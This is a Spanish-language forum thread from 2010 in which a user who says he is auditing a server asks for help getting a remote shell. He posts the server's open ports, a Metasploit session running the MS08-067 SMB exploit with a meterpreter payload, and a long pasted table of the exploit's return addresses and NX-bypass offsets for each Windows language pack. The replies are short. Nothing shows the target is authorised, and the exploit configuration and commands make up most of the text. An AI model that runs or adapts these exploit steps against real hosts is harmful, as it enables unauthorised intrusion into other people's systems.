Título: Problema para conseguir remote shell
Publicado por: Debci en 8 Enero 2010, 17:07 pm
Hola a todos, estoy auditando un servidor, que por la cantidad de puertos abiertos parece ser muy vulnerable, pero como ya comente hace tiempo, no puedo atacarle mediante el ms08_067_netapi, en puerto 445 abierto (sip, esta abierto), por que no detecta bien el paquete de idiomas del guind0$, estos son los puertos abiertos (que no se os caiga la baba): 7/tcp open echo 9/tcp open discard 13/tcp open daytime 17/tcp open qotd 19/tcp open chargen 21/tcp open ftp 25/tcp open smtp 53/tcp open domain 80/tcp open http 110/tcp open pop3 135/tcp open msrpc 139/tcp open netbios-ssn 443/tcp open https 445/tcp open microsoft-ds 1025/tcp open NFS-or-IIS 1027/tcp open IIS 1028/tcp open unknown 1029/tcp open ms-lsa 1030/tcp open iad1 1031/tcp open iad2 1455/tcp open esl-lm 3306/tcp open mysql 3389/tcp open ms-term-serv 8009/tcp open ajp13 8080/tcp open http-proxy 8085/tcp open unknown 8402/tcp open unknown 8443/tcp open https-alt
Bien ahora viene la parte técnica en la cual fallo: debci@0x81:/pentest/exploits/framework3$ sudo ./msfconsole [sudo] password for debci:
_ | | o _ _ _ _ _|_ __, , _ | | __ _|_ / |/ |/ | |/ | / | / \_|/ \_|/ / \_| | | | |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/ /| \|
=[ metasploit v3.3.4-dev [core:3.3 api:1.0] + -- --=[ 491 exploits - 225 auxiliary + -- --=[ 251 payloads - 23 encoders - 8 nops =[ svn r8082 updated today (2010.01.07)
msf > use exploit/windows/smb/ms08_067_netapi 3 RHOST => xxxxxxxxxxtapi) > set RHOST xx.xx.xx.xx rpreter/bind_tcpmsf exploit(ms08_067_netapi) > set PAYLOAD windows/mete PAYLOAD => windows/meterpreter/bind_tcp msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler [*] Automatically detecting the target... [*] Fingerprint: Windows 2003 R2 Service Pack 2 - lang:Unknown [*] Could not determine the exact language pack [*] Exploit completed, but no session was created. msf exploit(ms08_067_netapi) >
Entonces, me puse a investigar (siguiendo un link que el compañero kamsky me proporcionó): http://www.pentester.es/2009/11/por-que-no-consigo-shell-con-mi.html Bien, pero en esa guia, se explica como hacerlo trasteando con un proceso .exe de windows, y yo trabajo bajo linux, e aqui el problema, de todos modos me puse a invetsigar sobre el exploit, en mi caso se ejecuta bajo el interprete del framework metasploit, y para mi sorpresa, si que tiene el idioma castellano, el cual es el probable del host, observen: # # UNIVERSAL TARGETS #
# # Antoine's universal for Windows 2000 # Warning: DO NOT CHANGE THE OFFSET OF THIS TARGET # [ 'Windows 2000 Universal', { 'Ret' => 0x001f1cb0, 'Scratch' => 0x00020408, } ], # JMP EDI SVCHOST.EXE
# # Standard return-to-ESI without NX bypass # Warning: DO NOT CHANGE THE OFFSET OF THIS TARGET # [ 'Windows XP SP0/SP1 Universal', { 'Ret' => 0x01001361, 'Scratch' => 0x00020408, } ], # JMP ESI SVCHOST.EXE
# # ENGLISH TARGETS #
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP2 English (NX)', { 'Ret' => 0x6f88f727, 'DisableNX' => 0x6f8916e2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP3 English (NX)', { 'Ret' => 0x6f88f807, 'DisableNX' => 0x6f8917c2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Standard return-to-ESI without NX bypass [ 'Windows 2003 SP0 Universal', { 'Ret' => 0x0100129e, 'Scratch' => 0x00020408, } ], # JMP ESI SVCHOST.EXE
# Standard return-to-ESI without NX bypass [ 'Windows 2003 SP1 English (NO NX)', { 'Ret' => 0x71bf21a2, 'Scratch' => 0x00020408, } ], # JMP ESI WS2HELP.DLL
# Brett Moore's crafty NX bypass for 2003 SP1 [ 'Windows 2003 SP1 English (NX)', { 'RetDec' => 0x7c90568c, # dec ESI, ret @SHELL32.DLL 'RetPop' => 0x7ca27cf4, # push ESI, pop EBP, ret @SHELL32.DLL 'JmpESP' => 0x7c86fed3, # jmp ESP @NTDLL.DLL 'DisableNX' => 0x7c83e413, # NX disable @NTDLL.DLL 'Scratch' => 0x00020408, } ],
# Standard return-to-ESI without NX bypass [ 'Windows 2003 SP2 English (NO NX)', { 'Ret' => 0x71bf3969, 'Scratch' => 0x00020408, } ], # JMP ESI WS2HELP.DLL
# Brett Moore's crafty NX bypass for 2003 SP2 [ 'Windows 2003 SP2 English (NX)', { 'RetDec' => 0x7c86beb8, # dec ESI, ret @NTDLL.DLL 'RetPop' => 0x7ca1e84e, # push ESI, pop EBP, ret @SHELL32.DLL 'JmpESP' => 0x7c86a01b, # jmp ESP @NTDLL.DLL 'DisableNX' => 0x7c83f517, # NX disable @NTDLL.DLL 'Scratch' => 0x00020408, } ],
# # NON-ENGLISH TARGETS - AUTOMATICALLY GENERATED #
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP2 Arabic (NX)', { 'Ret' => 0x6fd8f727, 'DisableNX' => 0x6fd916e2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP2 Chinese - Traditional / Taiwan (NX)', { 'Ret' => 0x5860f727, 'DisableNX' => 0x586116e2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP2 Chinese - Simplified (NX)', { 'Ret' => 0x58fbf727, 'DisableNX' => 0x58fc16e2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP2 Chinese - Traditional (NX)', { 'Ret' => 0x5860f727, 'DisableNX' => 0x586116e2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP2 Czech (NX)', { 'Ret' => 0x6fe1f727, 'DisableNX' => 0x6fe216e2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP2 Danish (NX)', { 'Ret' => 0x5978f727, 'DisableNX' => 0x597916e2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP2 German (NX)', { 'Ret' => 0x6fd9f727, 'DisableNX' => 0x6fda16e2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP2 Greek (NX)', { 'Ret' => 0x592af727, 'DisableNX' => 0x592b16e2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP2 Spanish (NX)', { 'Ret' => 0x6fdbf727, 'DisableNX' => 0x6fdc16e2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP2 Finnish (NX)', { 'Ret' => 0x597df727, 'DisableNX' => 0x597e16e2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP2 French (NX)', { 'Ret' => 0x595bf727, 'DisableNX' => 0x595c16e2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP2 Hebrew (NX)', { 'Ret' => 0x5940f727, 'DisableNX' => 0x594116e2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP2 Hungarian (NX)', { 'Ret' => 0x5970f727, 'DisableNX' => 0x597116e2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP2 Italian (NX)', { 'Ret' => 0x596bf727, 'DisableNX' => 0x596c16e2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP2 Japanese (NX)', { 'Ret' => 0x567fd3be, 'DisableNX' => 0x568016e2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP2 Korean (NX)', { 'Ret' => 0x6fd6f727, 'DisableNX' => 0x6fd716e2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP2 Dutch (NX)', { 'Ret' => 0x596cf727, 'DisableNX' => 0x596d16e2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP2 Norwegian (NX)', { 'Ret' => 0x597cf727, 'DisableNX' => 0x597d16e2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP2 Polish (NX)', { 'Ret' => 0x5941f727, 'DisableNX' => 0x594216e2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP2 Portuguese - Brazilian (NX)', { 'Ret' => 0x596ff727, 'DisableNX' => 0x597016e2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP2 Portuguese (NX)', { 'Ret' => 0x596bf727, 'DisableNX' => 0x596c16e2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP2 Russian (NX)', { 'Ret' => 0x6fe1f727, 'DisableNX' => 0x6fe216e2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP2 Swedish (NX)', { 'Ret' => 0x597af727, 'DisableNX' => 0x597b16e2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP2 Turkish (NX)', { 'Ret' => 0x5a78f727, 'DisableNX' => 0x5a7916e2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP3 Arabic (NX)', { 'Ret' => 0x6fd8f807, 'DisableNX' => 0x6fd917c2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP3 Chinese - Traditional / Taiwan (NX)', { 'Ret' => 0x5860f807, 'DisableNX' => 0x586117c2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP3 Chinese - Simplified (NX)', { 'Ret' => 0x58fbf807, 'DisableNX' => 0x58fc17c2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP3 Chinese - Traditional (NX)', { 'Ret' => 0x5860f807, 'DisableNX' => 0x586117c2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP3 Czech (NX)', { 'Ret' => 0x6fe1f807, 'DisableNX' => 0x6fe217c2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP3 Danish (NX)', { 'Ret' => 0x5978f807, 'DisableNX' => 0x597917c2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP3 German (NX)', { 'Ret' => 0x6fd9f807, 'DisableNX' => 0x6fda17c2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP3 Greek (NX)', { 'Ret' => 0x592af807, 'DisableNX' => 0x592b17c2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP3 Spanish (NX)', { 'Ret' => 0x6fdbf807, 'DisableNX' => 0x6fdc17c2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP3 Finnish (NX)', { 'Ret' => 0x597df807, 'DisableNX' => 0x597e17c2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP3 French (NX)', { 'Ret' => 0x595bf807, 'DisableNX' => 0x595c17c2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP3 Hebrew (NX)', { 'Ret' => 0x5940f807, 'DisableNX' => 0x594117c2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP3 Hungarian (NX)', { 'Ret' => 0x5970f807, 'DisableNX' => 0x597117c2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP3 Italian (NX)', { 'Ret' => 0x596bf807, 'DisableNX' => 0x596c17c2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP3 Japanese (NX)', { 'Ret' => 0x567fd4d2, 'DisableNX' => 0x568017c2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP3 Korean (NX)', { 'Ret' => 0x6fd6f807, 'DisableNX' => 0x6fd717c2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP3 Dutch (NX)', { 'Ret' => 0x596cf807, 'DisableNX' => 0x596d17c2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP3 Norwegian (NX)', { 'Ret' => 0x597cf807, 'DisableNX' => 0x597d17c2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP3 Polish (NX)', { 'Ret' => 0x5941f807, 'DisableNX' => 0x594217c2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP3 Portuguese - Brazilian (NX)', { 'Ret' => 0x596ff807, 'DisableNX' => 0x597017c2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP3 Portuguese (NX)', { 'Ret' => 0x596bf807, 'DisableNX' => 0x596c17c2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP3 Russian (NX)', { 'Ret' => 0x6fe1f807, 'DisableNX' => 0x6fe217c2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP3 Swedish (NX)', { 'Ret' => 0x597af807, 'DisableNX' => 0x597b17c2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP3 Turkish (NX)', { 'Ret' => 0x5a78f807, 'DisableNX' => 0x5a7917c2, 'Scratch' => 0x00020408 } Una vez dicho esto, quiero pedirles ayuda, como puedo hacerlo? estoy encerrado, no se como hacerlo, y conozco muy pocas vulnerabilidades que explotar, la que mas usaba era la ms08_67_netapi pero esta vez ha fallado, y hechandole con el sacner nessus y un autopwn tampoco tira ( no esperaba mucho de este ultimo -.-'). Admito vulnerabilidades posibles en el host. Si lo consigo lo masterizare como guia de ataque modelo. Saludos y gracias a tod@s.
Título: Re: Problema para conseguir remote shell
Publicado por: Shell Root en 8 Enero 2010, 18:28 pm
mmm a ver. Se ha hablado varias veces de esto y se ha dicho que puede ser problema de: Saludos!
Título: Re: Problema para conseguir remote shell
Publicado por: Debci en 8 Enero 2010, 20:22 pm
mmm a ver. Se ha hablado varias veces de esto y se ha dicho que puede ser problema de: Saludos! mmmm seguro que el hecho de que no detecte el idioma es problema del firewall? Saludos
Título: Re: Problema para conseguir remote shell
Publicado por: Shell Root en 8 Enero 2010, 20:25 pm
... y conozco muy pocas vulnerabilidades que explotar, la que mas usaba era la ms08_67_netapi pero esta vez ha fallado. Lo dijé por esto... :D Saludos!
Título: Re: Problema para conseguir remote shell
Publicado por: Debci en 8 Enero 2010, 20:28 pm
... y conozco muy pocas vulnerabilidades que explotar, la que mas usaba era la ms08_67_netapi pero esta vez ha fallado. Lo dijé por esto... :D Saludos! En ese, caso, que em recomiendas hacer ahora? Saludos
Título: Re: Problema para conseguir remote shell
Publicado por: R007h en 10 Enero 2010, 04:31 am
Primero, que brinde muchos servicios no quiere decir que sea muuy vulnerable...(cuando hay un buen admin xD)
Estudiate alguna otra vulnerabilidad, esa no es la unica que existe xD
Salu2
|